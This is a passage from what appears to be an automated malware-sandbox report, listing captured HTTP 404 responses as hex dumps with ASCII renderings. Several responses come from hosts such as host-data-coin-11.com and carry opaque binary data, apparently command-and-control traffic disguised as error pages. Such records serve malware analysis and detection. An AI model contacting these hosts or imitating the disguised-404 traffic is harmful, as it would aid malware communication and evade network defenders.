6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 31 Dec 2021 18:06:50 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 50 df 41 d7 f7 22 82 23 e9 af 9a 56 29 e6 b7 4f 29 e3 b3 b7 6d f4 9d ba 5f a9 74 92 ca 31 46 5a 3c 02 49 d3 bb 55 ab e9 5d 8f ad d6 05 c0 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XPA"#V)O)m_t1FZ<IU]`i0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:07:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c ee af 88 70 bc 57 dd 42 d0 fc 25 84 26 e8 c3 90 52 2e ee a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9LpWB%&R.c0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e7 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 55 3f 41 be f2 d8 fc fb 43 fc 53 cd 76 bb 44 10 99 04 e1 fa 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OU?ACSvDg2P0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 